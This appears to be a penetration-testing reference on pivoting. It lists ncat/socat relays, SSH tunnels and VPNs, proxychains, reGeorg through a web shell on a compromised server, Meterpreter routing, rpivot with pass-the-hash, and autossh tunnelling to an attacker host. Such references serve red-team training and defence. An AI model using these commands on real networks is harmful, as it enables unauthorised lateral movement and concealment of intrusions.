A Penetration Testing Framework
Type | Use Case |
Listen - Listen | Exposed asset, may not want to connect out. |
Listen - Connect | Normal redirect. |
Connect - Connect | Can’t bind, so connect to bridge two hosts |
ncat -v -l -p 8080 -c "ncat -v -l -p 9090"
socat -v tcp-listen:8080 tcp-listen:9090
We connect to the first side of the listen->listen trigger and send the file as input.
ncat localhost 8080 < file
We connect to the second side of the listen->listen trigger and write the output to disk.
ncat localhost 9090 > newfile
ncat -l -v -p 8080 -c "ncat localhost 9090"
socat -v tcp-listen:8080,reuseaddr tcp-connect:localhost:9090
We connect to the listen side of the listen->connect trigger and send file as input.
ncat localhost -p 8080 < file
We wait and listen for the connect from the listen->connect trigger and write the file to disk.
ncat -l -p 9090 > newfile
Remote host listeners must be bound first.
ncat localhost 8080 -c "ncat localhost 9090"
Remote host listeners must be bound first.
socat -v tcp-connect:localhost:8080,reuseaddr tcp-connect:localhost:9090
We bind and listen to port 8080 and send the file as input.
ncat -l -p 8080 < file
We bind and listen to port 9090 and write the data to disk.
ncat -l -p 9090 > newfile
Dynamic SOCKS Proxy
This can be used with proxychains to forward client traffic through the remote server.
ssh -D8080 [user]@[host]
Local Port Forwarding
This will bind to [bindaddr]:[port] on the client and forward through the SSH server to the [dsthost]:[dstport]
ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]
Remote Port Forwarding
This will bind to [bindaddr]:[port] on the remote server and tunnel traffic through the ssh client side to [localhost]:[localport]
ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
Establish VPN over SSH The following options must be enabled on the server side.
PermitRootLogin yes
PermitTunnel yes
ssh [user]@[host] -w any:any
You can see the established tun interface by typing ifconfig -a
The interfaces and forwarding must still be configured. This assumes that we are going to forward through the remote server. We are also assuming that the server’s main connection is through eth0, and both client/server stood up tun0. This may be different if you already have existing VPN connections.
ip addr add peer dev tun0
# Once Server is setup, run the following to add routes
route add -net gw
ip addr add peer dev tun0
sysctl -w net.ipv4.ip_forward=1
iptables -t nat -A POSTROUTING -s -o eth0 -j MASQUERADE
The configuration file in /etc/proxychains.conf must be edited to point towards your SOCKS proxy. Typically this is done with an SSH or other type of tunnel. Make sure your ports match.
socks4 localhost 8080
Now, in order to run any type of network through the proxy just run it like so. Remember, you can’t run any raw socket scans through a SOCKS4 proxy. You need to setup an SSH VPN tunnel or something similar for that type of functionality.
proxychains nmap
reGeorg is a fantastic tool for using SOCKS proxies through a compromised web server. The delivery mechanism can be aspx,asph,jsp, or php. Simply upload the desired file to the webserver.
python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp
You are now free to use your regular tools using proxychains.
Meterpreter allows you to create pivoting routes within the framework for use with any of the builtin modules. To automatically route, just use the following.
run autoroute -s
To print routes
run autoroute -p
Now you can run other tools through Meterpreter using proxychains.
use auxiliary/server/socks4a
set SRVPORT 8080
Below will forward rdesktop sessions from localhost port 3389 to the target through Meterpreter as a tunnel.
portfwd add -L -l 3389 -r -p 3389
Rpivot is a great SOCKS proxy based pivot tool that works like SSH’s dynamic proxy -D option, but it works in the reverse order.
python server.py --proxy-port 1080 --server-port 9443 --server-ip
python client.py --server-ip <ip> --server-port 9443
The Server will now have a SOCKS proxy on port 1080 that will forward traffic through the [client].
Rpivot also works through corporate proxies.
python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e
If you prefer passing the hash, then you’re also in luck.
python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe \
--hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE
AutoSSH is a tool that allows you to automatically restart SSH sessions and tunnels. The following line will open port 2222 on host attacker and tunnel it to the compromised host on port 22. You would then be able to setup a dynamic SSH SOCKS proxy and connect to localhost:2222 and be able to forward through the compromised host as normal.
autossh -M 0 -o "ServerAliveInterval 30" -o "ServerAliveCountMax 3" -L 2222:localhost:22 [evil]@[attacker]